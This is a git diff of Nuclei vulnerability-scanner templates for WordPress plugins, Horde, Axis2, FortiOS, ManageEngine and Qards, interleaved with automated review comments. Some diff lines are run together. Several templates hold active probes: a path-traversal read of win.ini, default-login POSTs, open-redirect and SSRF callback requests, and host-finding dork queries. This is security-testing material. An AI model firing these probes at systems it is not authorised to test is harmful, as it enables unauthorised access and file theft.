+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "exit-notifier"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.9.1')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-8731-b5fad8172a537c5460328250b82e6ef6.yaml b/poc/cve/CVE-2024-8731-b5fad8172a537c5460328250b82e6ef6.yaml
new file mode 100644
index 0000000000..571072f559
--- /dev/null
+++ b/poc/cve/CVE-2024-8731-b5fad8172a537c5460328250b82e6ef6.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-8731-b5fad8172a537c5460328250b82e6ef6
+
+info:
+ name: >
+ Cron Jobs <= 1.2.9 - Reflected Cross-Site Scripting
+ author: topscoder
+ severity: medium
+ description: >
+ The Cron Jobs plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 1.2.9. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/5f6da693-4610-4875-aa14-102809309b8d?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2024-8731
+ metadata:
+ fofa-query: "wp-content/plugins/leira-cron-jobs/"
+ google-query: inurl:"/wp-content/plugins/leira-cron-jobs/"
+ shodan-query: 'vuln:CVE-2024-8731'
+ tags: cve,wordpress,wp-plugin,leira-cron-jobs,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/leira-cron-jobs/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "leira-cron-jobs"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.2.9')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-8732-f30eab986c0f8516da683155679193fc.yaml b/poc/cve/CVE-2024-8732-f30eab986c0f8516da683155679193fc.yaml
new file mode 100644
index 0000000000..b28d5f0d68
--- /dev/null
+++ b/poc/cve/CVE-2024-8732-f30eab986c0f8516da683155679193fc.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-8732-f30eab986c0f8516da683155679193fc
+
+info:
+ name: >
+ Roles & Capabilities <= 1.1.9 - Reflected Cross-Site Scripting
+ author: topscoder
+ severity: medium
+ description: >
+ The Roles & Capabilities plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 1.1.9. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/3956cd40-6b46-4013-9d71-a979de2c3687?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2024-8732
+ metadata:
+ fofa-query: "wp-content/plugins/leira-roles/"
+ google-query: inurl:"/wp-content/plugins/leira-roles/"
+ shodan-query: 'vuln:CVE-2024-8732'
+ tags: cve,wordpress,wp-plugin,leira-roles,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/leira-roles/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "leira-roles"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.1.9')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-8734-0bca25c266f3dd7ab05ff586726bddcc.yaml b/poc/cve/CVE-2024-8734-0bca25c266f3dd7ab05ff586726bddcc.yaml
new file mode 100644
index 0000000000..7781b36ca7
--- /dev/null
+++ b/poc/cve/CVE-2024-8734-0bca25c266f3dd7ab05ff586726bddcc.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-8734-0bca25c266f3dd7ab05ff586726bddcc
+
+info:
+ name: >
+ Lucas String Replace <= 2.0.5 - Reflected Cross-Site Scripting
+ author: topscoder
+ severity: medium
+ description: >
+ The Lucas String Replace plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 2.0.5. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/cf1e4b20-e7e5-4a3a-9895-02d51499d54e?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2024-8734
+ metadata:
+ fofa-query: "wp-content/plugins/lucas-string-replace/"
+ google-query: inurl:"/wp-content/plugins/lucas-string-replace/"
+ shodan-query: 'vuln:CVE-2024-8734'
+ tags: cve,wordpress,wp-plugin,lucas-string-replace,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/lucas-string-replace/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "lucas-string-replace"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 2.0.5')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-8737-bb181fa6ba6a94643f4ee6a0b1df28c1.yaml b/poc/cve/CVE-2024-8737-bb181fa6ba6a94643f4ee6a0b1df28c1.yaml
new file mode 100644
index 0000000000..a250aa5111
--- /dev/null
+++ b/poc/cve/CVE-2024-8737-bb181fa6ba6a94643f4ee6a0b1df28c1.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-8737-bb181fa6ba6a94643f4ee6a0b1df28c1
+
+info:
+ name: >
+ PDF Thumbnail Generator <= 1.3 - Reflected Cross-Site Scripting
+ author: topscoder
+ severity: medium
+ description: >
+ The PDF Thumbnail Generator plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 1.3. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/b183587b-95bd-4e82-bfc7-db5a8fbd58f9?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2024-8737
+ metadata:
+ fofa-query: "wp-content/plugins/pdf-thumbnail-generator/"
+ google-query: inurl:"/wp-content/plugins/pdf-thumbnail-generator/"
+ shodan-query: 'vuln:CVE-2024-8737'
+ tags: cve,wordpress,wp-plugin,pdf-thumbnail-generator,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/pdf-thumbnail-generator/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "pdf-thumbnail-generator"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.3')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-8742-40e6379c1e4c681d6815f3308854ba0d.yaml b/poc/cve/CVE-2024-8742-40e6379c1e4c681d6815f3308854ba0d.yaml
new file mode 100644
index 0000000000..b2d3b4c930
--- /dev/null
+++ b/poc/cve/CVE-2024-8742-40e6379c1e4c681d6815f3308854ba0d.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-8742-40e6379c1e4c681d6815f3308854ba0d
+
+info:
+ name: >
+ Essential Addons for Elementor <= 6.0.3 - Authenticated (Contributor+) Stored Cross-Site Scripting via Filterable Gallery Widget
+ author: topscoder
+ severity: low
+ description: >
+ The Essential Addons for Elementor – Best Elementor Addon, Templates, Widgets, Kits & WooCommerce Builders plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Filterable Gallery widget in all versions up to, and including, 6.0.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/76c292dc-e9da-4256-82df-58ac5def4771?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 6.4
+ cve-id: CVE-2024-8742
+ metadata:
+ fofa-query: "wp-content/plugins/essential-addons-for-elementor-lite/"
+ google-query: inurl:"/wp-content/plugins/essential-addons-for-elementor-lite/"
+ shodan-query: 'vuln:CVE-2024-8742'
+ tags: cve,wordpress,wp-plugin,essential-addons-for-elementor-lite,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/essential-addons-for-elementor-lite/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "essential-addons-for-elementor-lite"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 6.0.3')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-8747-f757d510ac120bf89329e22a6153766c.yaml b/poc/cve/CVE-2024-8747-f757d510ac120bf89329e22a6153766c.yaml
new file mode 100644
index 0000000000..cc1324f287
--- /dev/null
+++ b/poc/cve/CVE-2024-8747-f757d510ac120bf89329e22a6153766c.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-8747-f757d510ac120bf89329e22a6153766c
+
+info:
+ name: >
+ Email Obfuscate Shortcode <= 2.0 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+ The Email Obfuscate Shortcode plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'email-obfuscate' shortcode in all versions up to, and including, 2.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/77bed6ce-84e7-4b71-8acd-bb5b73e362d2?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 6.4
+ cve-id: CVE-2024-8747
+ metadata:
+ fofa-query: "wp-content/plugins/email-obfuscate-shortcode/"
+ google-query: inurl:"/wp-content/plugins/email-obfuscate-shortcode/"
+ shodan-query: 'vuln:CVE-2024-8747'
+ tags: cve,wordpress,wp-plugin,email-obfuscate-shortcode,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/email-obfuscate-shortcode/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "email-obfuscate-shortcode"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 2.0')
\ No newline at end of file
diff --git a/poc/cve/cve-2005-3344.yaml b/poc/cve/cve-2005-3344.yaml
index 89f0e31e60..d81cd137c4 100644
--- a/poc/cve/cve-2005-3344.yaml
+++ b/poc/cve/cve-2005-3344.yaml @@ -5,46 +5,32 @@ info: author: pikpikcu severity: critical description: Horde Groupware contains an administrative account with a blank password, which allows remote attackers to gain access. - impact: | - An attacker can gain unauthorized access to sensitive administrative functions and potentially compromise the entire system. - remediation: | - Apply the latest security patches or upgrade to a patched version of Horde Groupware to fix the vulnerability. + tags: horde,unauth + remediation: reference: - https://nvd.nist.gov/vuln/detail/CVE-2005-3344 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3344 - - http://www.debian.org/security/2005/dsa-884 - - http://www.networkscanning.com/Horde-Default-Admin-Password-Vulnerability-VSS_20171.html - - https://exchange.xforce.ibmcloud.com/vulnerabilities/24576 classification: - cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:C/I:C/A:C - cvss-score: 10 cve-id: CVE-2005-3344 - cwe-id: NVD-CWE-Other - epss-score: 0.02158 - epss-percentile: 0.88203 - cpe: cpe:2.3:a:horde:horde:3.0.4:*:*:*:*:*:*:* - metadata: - max-request: 2 - vendor: horde - product: horde - tags: cve2005,cve,horde,unauth -http: +requests: - method: GET path: - "{{BaseURL}}/horde/admin/user.php" - "{{BaseURL}}/admin/user.php" - headers: Content-Type: text/html matchers-condition: and matchers: + - type: word words: - "Horde :: User Administration" + condition: and - type: status status: - 200 -# digest: 490a0046304402200f6ab7e5b811ae50b7feb5a05fd7996c735219dbe8a152b9c4cfd263af7405d6022054184a20298d9717f3c6263e0ca1083caa2941df71af109b0f69013ab683cec8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# Enhanced by mp on 2022/03/18 diff --git a/poc/cve/cve-2010-0219.yaml b/poc/cve/cve-2010-0219.yaml index 162fed1a75..9e44b7dcc9 100644 --- a/poc/cve/cve-2010-0219.yaml +++ b/poc/cve/cve-2010-0219.yaml 
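Review bot: `remediation:` on the new side has no value, so it loads as a YAML null under `info`; either restore the one-line text that was there (`remediation: Apply the latest security patches or upgrade to a patched version of Horde Groupware to fix the vulnerability.`) or drop the key. The new `tags: horde,unauth` no longer carries `cve` or `cve2005`, so tag-based selection such as `-tags cve` skips this template; `tags: cve,cve2005,horde,unauth` keeps it selectable. `condition: and` on a `word` matcher with a single entry is a no-op and can go. Renaming `http:` back to `requests:` reverts to the pre-v3 key name, which the engine still reads with a deprecation notice as far as I know; the same revert is applied to every modified template in this commit (cve-2010-0219, cve-2016-3978, cve-2017-11512, cve-2017-18598, cve-2017-5631, cve-2017-9833, cve-2018-1000226, cve-2018-10956, cve-2018-12300).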
@@ -3,34 +3,16 @@ id: CVE-2010-0219 info: name: Apache Axis2 Default Login author: pikpikcu - severity: critical + severity: high description: Apache Axis2, as used in dswsbobje.war in SAP BusinessObjects Enterprise XI 3.2, CA ARCserve D2D r15, and other products, has a default password of axis2 for the admin account, which makes it easier for remote attackers to execute arbitrary code by uploading a crafted web service. - impact: | - Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information or the ability to modify or delete data. - remediation: | - Disable or restrict access to the Axis2 web interface, or apply the necessary patches or updates provided by the vendor. + tags: cve,cve2010,axis,apache,default-login,axis2 reference: - https://nvd.nist.gov/vuln/detail/CVE-2010-0219 - https://knowledge.broadcom.com/external/article/13994/vulnerability-axis2-default-administrato.html - - http://www.rapid7.com/security-center/advisories/R7-0037.jsp - - http://www.vupen.com/english/advisories/2010/2673 - - http://retrogod.altervista.org/9sg_ca_d2d.html classification: - cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:C/I:C/A:C - cvss-score: 10 cve-id: CVE-2010-0219 - cwe-id: CWE-255 - epss-score: 0.97509 - epss-percentile: 0.99981 - cpe: cpe:2.3:a:apache:axis2:1.3:*:*:*:*:*:*:* - metadata: - max-request: 2 - vendor: apache - product: axis2 - shodan-query: http.html:"Apache Axis" - tags: cve,cve2010,axis,apache,default-login,axis2 -http: +requests: - raw: - | POST /axis2-admin/login HTTP/1.1 @@ -38,6 +20,7 @@ http: Content-Type: application/x-www-form-urlencoded loginUsername={{username}}&loginPassword={{password}} + - | POST /axis2/axis2-admin/login HTTP/1.1 Host: {{Hostname}} @@ -54,6 +37,7 @@ http: matchers-condition: and matchers: + - type: word words: - "
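Review bot: `severity: high` is set for a default admin password that the unchanged `description` says lets remote attackers execute arbitrary code by uploading a crafted web service, while the CVSS 10.0 vector and score that supported `critical` are removed in the same hunk, so the downgrade is left undocumented. If it is intentional, put the reason in a comment next to it; otherwise keep `severity: critical`. The hunk also drops `shodan-query: http.html:"Apache Axis"`, the only fingerprint hint the template carried, which is worth keeping under `metadata` even when the rest of the block goes.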

Welcome to Axis2 Web Admin Module !!

" @@ -61,4 +45,5 @@ http: - type: status status: - 200 -# digest: 490a0046304402207ae0781d6298d63fef1e109c6941979f3a9cf2cf97cf52d54fbf5506d103256d02202ab0a38916296abc146346b756d193740490f3a762c1929bf019e92da272776c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# Enhanced by mp on 2022/03/02 diff --git a/poc/cve/cve-2016-1000136.yaml b/poc/cve/cve-2016-1000136.yaml index f6b6733834..3adf484b9b 100644 --- a/poc/cve/cve-2016-1000136.yaml +++ b/poc/cve/cve-2016-1000136.yaml @@ -8,13 +8,12 @@ info: reference: - http://www.vapidlabs.com/wp/wp_advisory.php?v=798 - https://nvd.nist.gov/vuln/detail/CVE-2016-1000136 - - https://wordpress.org/plugins/heat-trackr + tags: cve,cve2016,wordpress,xss,wp-plugin classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 + cvss-score: 6.10 cve-id: CVE-2016-1000136 cwe-id: CWE-79 - tags: cve,cve2016,wordpress,xss,wp-plugin requests: - method: GET diff --git a/poc/cve/cve-2016-3978.yaml b/poc/cve/cve-2016-3978.yaml index 9c1dd44d28..ac3ab10ad8 100644 --- a/poc/cve/cve-2016-3978.yaml +++ b/poc/cve/cve-2016-3978.yaml 
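Review bot: `cvss-score: 6.10` is an unquoted YAML scalar, so it is loaded as the float 6.1 and the trailing zero is discarded; the value was already `6.1` and the edit only changes how the score is written. Keep `cvss-score: 6.1`, which also matches the `6.1` retained in cve-2017-5631 and cve-2018-1000671 in this commit. The same rewrite appears in cve-2016-3978, cve-2017-18598 and cve-2018-12300 (`6.10`), cve-2017-9833 (`7.50`) and cve-2018-1000226 (`9.80`).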
@@ -1,41 +1,27 @@ id: CVE-2016-3978 info: - name: Fortinet FortiOS - Open Redirect/Cross-Site Scripting + name: FortiOS (Fortinet) - Open Redirect and XSS author: 0x_Akoko severity: medium - description: FortiOS Web User Interface in 5.0.x before 5.0.13, 5.2.x before 5.2.3, and 5.4.x before 5.4.0 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks or cross-site scripting attacks via the "redirect" parameter to "login." - impact: | - Successful exploitation of this vulnerability could lead to unauthorized access, phishing attacks, and potential data theft. - remediation: | - Apply the latest security patches and updates provided by Fortinet to mitigate the vulnerability. + description: The Web User Interface (WebUI) in FortiOS 5.0.x before 5.0.13, 5.2.x before 5.2.3, and 5.4.x before 5.4.0 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks or cross-site scripting (XSS) attacks via the "redirect" parameter to "login." 
reference: - - http://www.fortiguard.com/advisory/fortios-open-redirect-vulnerability + - https://seclists.org/fulldisclosure/2016/Mar/68 - https://nvd.nist.gov/vuln/detail/CVE-2016-3978 - - http://seclists.org/fulldisclosure/2016/Mar/68 - - http://www.securitytracker.com/id/1035332 + tags: cve,cve2016,redirect,fortinet,fortios classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 + cvss-score: 6.10 cve-id: CVE-2016-3978 cwe-id: CWE-79 - epss-score: 0.00217 - epss-percentile: 0.59667 - cpe: cpe:2.3:o:fortinet:fortios:5.0.0:*:*:*:*:*:*:* - metadata: - max-request: 1 - vendor: fortinet - product: fortios - tags: cve2016,cve,redirect,fortinet,fortios,seclists -http: +requests: - method: GET path: - - '{{BaseURL}}/login?redir=http://www.interact.sh' + - '{{BaseURL}}/login?redir=http://www.example.com' matchers: - type: regex part: header regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 -# digest: 490a0046304402201e517dd06332c852dc9e8a03d12eb20c9636dfc194690a007024ef333e978dba022062abb7e6dbc6349bc055a6faeffa048a2b20388fd1893538783af9670b6e35e0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 diff --git a/poc/cve/cve-2017-11512.yaml b/poc/cve/cve-2017-11512.yaml index 8b2924e2e0..095801ddf9 100644 --- a/poc/cve/cve-2017-11512.yaml +++ b/poc/cve/cve-2017-11512.yaml 
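Review bot: The new `matchers:` block is still a single regex on the `Location` header with no status check and no `matchers-condition`, so any response carrying a `Location` header that points at `example.com` is reported, including a 200 page that happens to set one. Pairing the header regex with a status matcher for the redirect codes keeps the same signal while rejecting non-redirect responses. The same single-regex shape is used by the new cve-2018-1000671 template and by cve-2018-12300 in this commit.
```yaml
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 301
          - 302
          - 303
          - 307
          - 308

      # … unchanged: Location header regex matcher …
```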
@@ -6,33 +6,22 @@ info: severity: high description: | ManageEngine ServiceDesk 9.3.9328 is vulnerable to an arbitrary file retrieval due to improper restrictions of the pathname used in the name parameter for the download-snapshot path. An unauthenticated remote attacker can use this vulnerability to download arbitrary files. - impact: | - An attacker can access sensitive files on the server, potentially leading to unauthorized access or data leakage. - remediation: | - Upgrade to a patched version of ManageEngine ServiceDesk 9.3.9328 or apply the necessary security patches. reference: - https://exploit.kitploit.com/2017/11/manageengine-servicedesk-cve-2017-11512.html - https://www.tenable.com/security/research/tra-2017-31 + - https://web.archive.org/web/20210116180015/https://www.securityfocus.com/bid/101789/ - https://nvd.nist.gov/vuln/detail/CVE-2017-11512 - - https://github.com/ARPSyndicate/kenzer-templates - - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2017-11512 cwe-id: CWE-22 - epss-score: 0.97175 - epss-percentile: 0.99794 - cpe: cpe:2.3:a:manageengine:servicedesk:9.3.9328:*:*:*:*:*:*:* metadata: - verified: true - max-request: 2 - vendor: manageengine - product: servicedesk shodan-query: http.title:"ManageEngine" + verified: "true" tags: cve,cve2017,manageengine,lfr,unauth,tenable -http: +requests: - method: GET path: - '{{BaseURL}}/fosagent/repl/download-file?basedir=4&filepath=..\..\Windows\win.ini' @@ -47,4 +36,5 @@ http: - "fonts" - "extensions" condition: and -# digest: 4a0a00473045022075475b13b0c988c21ece3fd5009fa0ed01ba7fef5c7daffb6579403d0bfdc831022100809a276461fd74d794533eaf19a7d5155c61d32b746d12ac53a958ef2f4dbaf6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# Enhanced by mp on 2022/06/09 diff --git a/poc/cve/cve-2017-18598.yaml b/poc/cve/cve-2017-18598.yaml index b7393b1790..d030fe66cd 100644 --- a/poc/cve/cve-2017-18598.yaml 
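Review bot: `verified: "true"` on the new side turns the boolean `true` into a string; tooling that filters on `metadata.verified` as a boolean will no longer treat this template as verified, and nothing else in the hunk needs the quotes. Keep `verified: true`. The new cve-2018-1000671 template in this commit uses the same quoted form.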
+++ b/poc/cve/cve-2017-18598.yaml 
@@ -1,62 +1,34 @@ -id: CVE-2017-18598 - -info: - name: WordPress Qards - Cross-Site Scripting - author: pussycat0x - severity: medium - description: WordPress Qards through 2017-10-11 contains a cross-site scripting vulnerability via a remote document specified in the URL parameter to html2canvasproxy.php. - impact: | - Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential theft of sensitive information or unauthorized actions. - remediation: | - Update to the latest version of the WordPress Qards plugin, which includes a fix for this vulnerability. - reference: - - https://wpscan.com/vulnerability/8934 - - https://wpscan.com/vulnerability/454a0ce3-ecfe-47fc-a282-5caa51370645 - - https://wpvulndb.com/vulnerabilities/8934 - - https://nvd.nist.gov/vuln/detail/CVE-2017-18598 - - https://github.com/ARPSyndicate/cvemon +id: CVE-2017-18598 + +info: + name: Qards Plugin - Stored XSS and SSRF + author: pussycat0x + severity: medium + description: The Qards plugin through 2017-10-11 for WordPress has XSS via a remote document specified in the url parameter to html2canvasproxy.php + reference: + - https://wpscan.com/vulnerability/8934 + - https://wpscan.com/vulnerability/454a0ce3-ecfe-47fc-a282-5caa51370645 + - https://nvd.nist.gov/vuln/detail/CVE-2017-18598 + tags: cve,cve2017,wordpress,ssrf,xss,wp-plugin,oast + classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 + cvss-score: 6.10 cve-id: CVE-2017-18598 cwe-id: CWE-79 - epss-score: 0.00094 - epss-percentile: 0.38554 - cpe: cpe:2.3:a:designmodo:qards:*:*:*:*:*:wordpress:*:* - metadata: - max-request: 1 - vendor: designmodo - product: qards - framework: wordpress - tags: cve2017,cve,wp-plugin,oast,wpscan,wordpress,ssrf,xss,designmodo - -flow: http(1) && http(2) - -http: - - raw: - - | - GET / HTTP/1.1 - Host: {{Hostname}} - - matchers: - - type: word - internal: true - words: - - 
'/wp-content/plugins/qards/' - - - method: GET - path: - - '{{BaseURL}}/wp-content/plugins/qards/html2canvasproxy.php?url=https://{{interactsh-url}}' - - matchers-condition: and - matchers: - - type: word - part: interactsh_protocol - words: - - "http" - - - type: word - part: body - words: - - "console.log" -# digest: 4b0a00483046022100a1ebb8975874781de2f146909353d3cb9d51b05b60508558c7d599376c062441022100c9a14b006fb26874b9b2f075e436d6c4ca526fe128d549c7c9a7fd5ed7c35cef:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/plugins/qards/html2canvasproxy.php?url=https://{{interactsh-url}}' + + matchers-condition: and + matchers: + - type: word + part: interactsh_protocol + words: + - "http" + + - type: word + part: body + words: + - "console.log" \ No newline at end of file diff --git a/poc/cve/cve-2017-5631.yaml b/poc/cve/cve-2017-5631.yaml index 8f0b35c820..6dcc26746a 100644 --- a/poc/cve/cve-2017-5631.yaml +++ b/poc/cve/cve-2017-5631.yaml 
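Review bot: The new side drops the `flow: http(1) && http(2)` gate together with the internal `words` check for `/wp-content/plugins/qards/`, so the request carrying `{{interactsh-url}}` is now sent to every scanned host whether or not the plugin is installed, which lowers precision and makes each scan trigger an outbound fetch from hosts that are not running Qards. If the target engine supports `flow`, keeping the homepage presence check as the first request and gating the proxy request on it restores that precision. `name: Qards Plugin - Stored XSS and SSRF` also disagrees with the `description`, which (like CWE-79 with `UI:R` in the vector) describes XSS via a remote document in the `url` parameter, i.e. reflected; `name: Qards Plugin - Cross-Site Scripting and SSRF via html2canvasproxy.php` matches it.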
@@ -1,35 +1,21 @@ id: CVE-2017-5631 info: - name: KMCIS CaseAware - Cross-Site Scripting + name: CaseAware - Cross Site Scripting author: edoardottt severity: medium - description: KMCIS CaseAware contains a reflected cross-site scripting vulnerability via the user parameter transmitted in the login.php query string. - impact: | - Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website. - remediation: | - To remediate this vulnerability, it is recommended to apply the latest patches or updates provided by the vendor. + description: An issue was discovered in KMCIS CaseAware. Reflected cross site scripting is present in the user parameter (i.e., "usr") that is transmitted in the login.php query string. reference: - - https://www.openbugbounty.org/incidents/228262/ - - https://www.exploit-db.com/exploits/42042/ - https://nvd.nist.gov/vuln/detail/CVE-2017-5631 - - 